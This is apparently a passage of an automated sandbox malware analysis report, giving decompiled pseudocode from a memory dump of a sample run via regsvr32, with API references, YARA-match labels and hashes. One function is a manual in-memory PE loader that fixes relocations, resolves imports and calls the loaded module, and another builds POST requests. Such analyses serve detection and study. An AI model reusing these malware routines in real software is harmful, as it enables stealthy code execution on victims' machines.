												_t139 =  *0x9af8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x9af8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x9af8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x9af8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x9af8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x9af8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x9af8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x9af8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}






























































            0x0099f7b1
            0x0099f7bd
            0x0099f7c4
            0x0099f7d1
            0x0099f7d4
            0x0099f7e5
            0x0099f7ef
            0x0099f7fa
            0x0099f807
            0x0099f814
            0x0099f821
            0x0099f824
            0x0099f829
            0x0099f82e
            0x0099f830
            0x0099f838
            0x0099f840
            0x0099f847
            0x0099f853
            0x0099f856
            0x0099f864
            0x0099f867
            0x0099f86d
            0x0099f86e
            0x0099f870
            0x0099f879
            0x0099f87a
            0x0099f87f
            0x0099f885
            0x0099f88f
            0x0099f88f
            0x0099f891
            0x0099f896
            0x0099f8a0
            0x0099f8ab
            0x0099f8b4
            0x0099f8b6
            0x0099f8b8
            0x0099f8c7
            0x0099f8de
            0x0099f8e4
            0x0099f8e7
            0x0099f8eb
            0x0099f8ed
            0x0099f8f2
            0x0099f8f2
            0x0099f8f7
            0x0099f8f9
            0x0099f90f
            0x0099f913
            0x0099f918
            0x0099f91a
            0x0099f91a
            0x0099f92e
            0x0099f939
            0x0099f93c
            0x0099f93f
            0x0099f942
            0x0099f947
            0x0099f94c
            0x0099f94c
            0x0099f94f
            0x0099f951
            0x0099f977
            0x0099f97b
            0x0099f97f
            0x0099f97f
            0x0099f989
            0x0099f991
            0x0099f996
            0x0099f9a1
            0x0099f9a7
            0x0099f9b1
            0x0099f9b4
            0x0099f9b9
            0x0099f9bd
            0x0099f9c2
            0x0099f9c2
            0x0099f9c7
            0x0099f9cb
            0x0099fa16
            0x0099fa18
            0x0099fa1b
            0x0099fa23
            0x0099fa27
            0x0099fa2a
            0x0099fa3c
            0x0099fa47
            0x0099fa49
            0x0099fa5d
            0x0099fa62
            0x0099fa67
            0x0099fa9c
            0x0099faa1
            0x0099faa6
            0x0099faa8
            0x00000000
            0x0099faa8
            0x0099fa6b
            0x0099fa6e
            0x0099fa6e
            0x0099fa74
            0x0099fa77
            0x0099fa7a
            0x0099fa7a
            0x0099fa7c
            0x0099fa7e
            0x0099fa84
            0x0099fa84
            0x0099fa87
            0x0099fa89
            0x0099fa8b
            0x0099fa92
            0x0099fa92
            0x00000000
            0x0099fa95
            0x0099fa4b
            0x0099fa51
            0x00000000
            0x0099f9cd
            0x0099f9cd
            0x0099f9d3
            0x0099f9d9
            0x0099f9dc
            0x0099f9e1
            0x0099f9e6
            0x0099f9e9
            0x0099f9ee
            0x0099f9ee
            0x0099f9f1
            0x0099f9f4
            0x00000000
            0x0099f9f4
            0x0099f953
            0x0099f953
            0x0099f959
            0x0099f95f
            0x0099f962
            0x0099f967
            0x0099f96a
            0x0099f96d
            0x0099f96f
            0x00000000
            0x0099f96f
            0x0099f8fb
            0x0099f8fb
            0x0099f901
            0x0099f907
            0x0099f9f7
            0x0099f9f7
            0x0099f9f7
            0x00000000
            0x0099f9f7
            0x0099f8f9
            0x0099f8ba
            0x0099f9f9
            0x0099f9fc
            0x0099f9fe
            0x0099fa01
            0x0099fa04
            0x0099fa04
            0x0099fa0d
            0x0099fa0f
            0x00000000
            0x00000000
            0x0099fa13
            0x00000000
            0x0099fa13
            0x0099f889
            0x00000000

            APIs
            • memset.MSVCRT ref: 0099F7D4
            • memset.MSVCRT ref: 0099F7E5
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0099F8BA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 0fb9bd38627b1415b34083df062a37e16f9093f0853ff9c9817b122cf9cdf42f
            • Instruction ID: 5b96dce06d702873cbe570a23ad075ced5bf2a4eeca0aea17b2bf5eaa039db73
            • Opcode Fuzzy Hash: 0fb9bd38627b1415b34083df062a37e16f9093f0853ff9c9817b122cf9cdf42f
            • Instruction Fuzzy Hash: 94A13C71A04219AFDF10DFA8D898BAEB7B8FF49310F244069F906E7250DB749E41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A14C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 972d32358749b9eb9179c434f7a709bed863f7960b4d54c0bf401c3c6bf315d8
            • Instruction ID: 00dd471b7b76575abc8a51330cf421e2972195ec3828c864226b9ef26c56a4ba
            • Opcode Fuzzy Hash: 972d32358749b9eb9179c434f7a709bed863f7960b4d54c0bf401c3c6bf315d8
            • Instruction Fuzzy Hash: 68E16BB190020ABFEF119FA4CC42FAF3BA9EF97354F108415FD159A151E635DA609BE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099503F Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E0099503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x9af8d4; // 0x452fc00
					_t96 =  *0x9af8d8; // 0x452fab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
				}
				if(E0099CB85(_t156) != 0) {
					L4:
					_t47 = E0099C85A();
					_push(_t99);
					_v588 = _t47;
					E0099C64D(_t47,  &_v580, _t173, _t175);
					_t100 = E00994FFB( &_v580,  &_v580, _t173);
					_t112 = E0099E34A( &_v580, E0099A5D0( &_v580), 0);
					E0099C870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E00993174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x9ac9d8);
						_t55 = E00999C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E00999AB3(_v596);
							_t116 = _t101;
							 *0x9af990 = _t56;
							 *0x9af988 = E00999AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E0099A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x9aca26);
							_t146 = 0xe;
							E0099AC36(_t146, _t175);
							E0099AC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E0099AC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E0099B1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E0099B1B1(_t149, _t175);
							}
							_t65 = E0099A1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E0099ABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x9af8d4; // 0x452fc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E009A0DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x9af8d4; // 0x452fc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E0099F15B(_t152);
									}
									E0099565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x9af8d4; // 0x452fc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E0099109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E00998D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x452fe28
								_t127 = _t32;
								L20:
								_t67 = E009958D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x9af8d4; // 0x452fc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E0099D210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x9af8d0; // 0x452f8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x9af8d0; // 0x452f8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E00998DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E00998DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E0099308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































            0x0099503f
            0x0099504c
            0x00995057
            0x0099505c
            0x0099505e
            0x00995061
            0x00995066
            0x00995069
            0x00995073
            0x00995075
            0x00995082
            0x0099508b
            0x0099508b
            0x00995098
            0x009950b3
            0x009950b5
            0x009950ba
            0x009950bf
            0x009950c5
            0x009950d4
            0x009950f3
            0x009950f5
            0x009950fa
            0x00995101
            0x00995106
            0x0099510d
            0x00995117
            0x00995119
            0x0099511a
            0x00995120
            0x00995125
            0x00995128
            0x0099512a
            0x0099512f
            0x00995196
            0x0099519b
            0x0099519d
            0x009951a7
            0x009951ac
            0x009951ac
            0x009951c6
            0x009951c8
            0x009951cb
            0x009951cd
            0x00000000
            0x00000000
            0x009951d3
            0x009951da
            0x009951dd
            0x009951e6
            0x009951eb
            0x009951f1
            0x009951f6
            0x009951fb
            0x009951ff
            0x00995201
            0x00995205
            0x00995205
            0x0099520a
            0x0099520d
            0x0099520f
            0x00995213
            0x00995213
            0x0099521a
            0x0099521f
            0x00995223
            0x00995226
            0x0099522b
            0x00995231
            0x00995232
            0x0099525a
            0x00995260
            0x00995267
            0x00995276
            0x0099527b
            0x00000000
            0x0099527b
            0x00995269
            0x00000000
            0x00995234
            0x00995234
            0x00995239
            0x00995240
            0x00995285
            0x00995285
            0x0099528c
            0x00995290
            0x00995291
            0x00995291
            0x0099529b
            0x009952a0
            0x009952a3
            0x009952a4
            0x009952a6
            0x009952a8
            0x009952ad
            0x009952b4
            0x009952f7
            0x009952b6
            0x009952bb
            0x009952c3
            0x009952c7
            0x009952d2
            0x009952dd
            0x009952e5
            0x009952e9
            0x009952f1
            0x009952f1
            0x009952b4
            0x009952fd
            0x00995300
            0x00995302
            0x00995308
            0x00995308
            0x0099530a
            0x0099530a
            0x00000000
            0x0099530a
            0x00995242
            0x00995242
            0x00995248
            0x0099524a
            0x0099524f
            0x0099524f
            0x00995251
            0x00995280
            0x00000000
            0x00995280
            0x00995253
            0x00995111
            0x00995111
            0x00000000
            0x00995111
            0x00995232
            0x00995135
            0x00995143
            0x00995156
            0x0099515b
            0x00995161
            0x00995163
            0x0099517b
            0x00995180
            0x00995189
            0x0099518f
            0x00000000
            0x0099518f
            0x0099516b
            0x00995174
            0x00000000
            0x00995174
            0x0099510f
            0x00000000
            0x0099509a
            0x009950a5
            0x009950ab
            0x009950ad
            0x0099530c
            0x0099530c
            0x0099530e
            0x00995314
            0x00995314
            0x00000000
            0x009950ad

            APIs
            • memset.MSVCRT ref: 00995061
            • lstrcpyW.KERNEL32 ref: 009952C7
            • lstrcatW.KERNEL32(00000000,?), ref: 009952E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 009952E9
            • lstrcatW.KERNEL32(00000000,009ACA28), ref: 009952F1
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 685742017ed7526f53c98257fab9c89ce096b7c82f4ab30b93be853f0fffe30c
            • Instruction ID: d3cc5a97c2386258420868a428006cb8e38490418f70b194ecb83e56dde1a2bb
            • Opcode Fuzzy Hash: 685742017ed7526f53c98257fab9c89ce096b7c82f4ab30b93be853f0fffe30c
            • Instruction Fuzzy Hash: E271FC31208301ABDB25EB28DC92B7F73EAEFC5710F14092DF4568B291EB7498048B82
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099DEAB Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0099DEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x9ac9d8);
						_t36 = E00999C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E00998DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















            0x0099deb4
            0x0099debb
            0x0099debe
            0x0099decb
            0x0099ded1
            0x0099ded4
            0x0099ded6
            0x0099dedb
            0x0099dfb3
            0x0099dfb3
            0x0099dfb3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099dee1
            0x0099dee1
            0x0099dee1
            0x0099dee4
            0x0099deea
            0x0099df06
            0x0099df0d
            0x0099df13
            0x0099df17
            0x0099df2b
            0x0099df2b
            0x0099df2e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099df19
            0x0099df19
            0x0099df1e
            0x0099df22
            0x0099df22
            0x0099df26
            0x0099df27
            0x00000000
            0x0099df19
            0x0099df2f
            0x0099df2f
            0x0099df32
            0x0099df33
            0x0099df3a
            0x0099df44
            0x00000000
            0x00000000
            0x0099df46
            0x0099df4c
            0x0099df50
            0x0099dfa9
            0x0099df59
            0x0099df66
            0x0099df6c
            0x0099df6e
            0x0099df75
            0x0099df7b
            0x0099df83
            0x0099df8b
            0x0099df97
            0x0099df9d
            0x00000000
            0x0099dfaf
            0x0099df3c
            0x00000000

            APIs
            • GetCommandLineW.KERNEL32 ref: 0099DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0099DECB
            • lstrlenW.KERNEL32 ref: 0099DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0099DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0099DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0099DFA9
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: cedcc27495eae47c5f77caad286fe19cd7c739a7e95607abbe051af49cf8da20
            • Instruction ID: eb78968c7b46988b08ef317f42779774a034d456369394256581bd3ae1a2f911
            • Opcode Fuzzy Hash: cedcc27495eae47c5f77caad286fe19cd7c739a7e95607abbe051af49cf8da20
            • Instruction Fuzzy Hash: C0313471C25115ABDF24AB9DDCCABAEB7B8EF46350F50409AE407E7190EB708D808B90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099E6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0099E6ED
            • SysAllocString.OLEAUT32(?), ref: 0099E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0099E709
            • SysFreeString.OLEAUT32(?), ref: 0099E784
            • SysFreeString.OLEAUT32(?), ref: 0099E787
            • SysFreeString.OLEAUT32(?), ref: 0099E78C
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 1b347694af4bdba32b722ad52f04cda4a8488db9b1cced20559dd3bb86ca2441
            • Instruction ID: 50ca2bd7b9a73672555c76c52319def7a79c55bc63c249a7fcc1270e06576b87
            • Opcode Fuzzy Hash: 1b347694af4bdba32b722ad52f04cda4a8488db9b1cced20559dd3bb86ca2441
            • Instruction Fuzzy Hash: 4821F975900218BFDF00DFA9CC88DAEBBBDEF89754B204499F505E7250DA71AE01DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A3DC7 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
            Download Yara Rule
            C-Code - Quality: 20%
            			E009A3DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































            0x009a3dd0
            0x009a3ddd
            0x009a3de3
            0x009a3dec
            0x009a3def
            0x009a3df2
            0x00000000
            0x009a3ee3
            0x009a3ee7
            0x009a3ee9
            0x009a3ef7
            0x009a4015
            0x009a4019
            0x009a40de
            0x009a40e7
            0x009a40ea
            0x009a40ee
            0x009a40f4
            0x009a40fc
            0x009a40fc
            0x009a4104
            0x009a4112
            0x009a4115
            0x009a4119
            0x009a411f
            0x009a412f
            0x009a415a
            0x00000000
            0x009a415c
            0x009a4135
            0x009a4146
            0x00000000
            0x009a4154
            0x009a4158
            0x00000000
            0x009a4154
            0x009a4148
            0x009a414c
            0x009a4151
            0x00000000
            0x009a4151
            0x009a4137
            0x009a413b
            0x009a413d
            0x00000000
            0x009a413d
            0x009a4121
            0x009a4125
            0x00000000
            0x009a4127
            0x009a401f
            0x009a4023
            0x009a4025
            0x009a4033
            0x00000000
            0x00000000
            0x009a4039
            0x009a4042
            0x009a4050
            0x009a405c
            0x009a4068
            0x009a4071
            0x009a4074
            0x009a4078
            0x009a407a
            0x009a4087
            0x009a409b
            0x009a40aa
            0x009a40bb
            0x009a4084
            0x00000000
            0x009a4084
            0x009a40bd
            0x009a40c1
            0x009a40c6
            0x00000000
            0x009a40c6
            0x009a40d1
            0x00000000
            0x00000000
            0x009a40d3
            0x009a40d7
            0x00000000
            0x009a40d9
            0x009a3efd
            0x009a3f06
            0x009a3f14
            0x009a3f17
            0x009a3f34
            0x009a3f3b
            0x009a3f4d
            0x009a3f4d
            0x009a3f54
            0x009a3f64
            0x009a3f7c
            0x009a3f66
            0x009a3f6e
            0x009a3f6e
            0x009a3f7f
            0x009a3f83
            0x009a3f93
            0x009a3fb6
            0x009a3fc8
            0x009a3f95
            0x009a3fa9
            0x009a3fa9
            0x009a3fd2
            0x009a3fee
            0x009a3fd4
            0x009a3fe3
            0x009a3fe3
            0x009a3ff6
            0x009a3fff
            0x009a3fff
            0x009a400d
            0x00000000
            0x009a3f56
            0x009a3f58
            0x00000000
            0x009a3f58
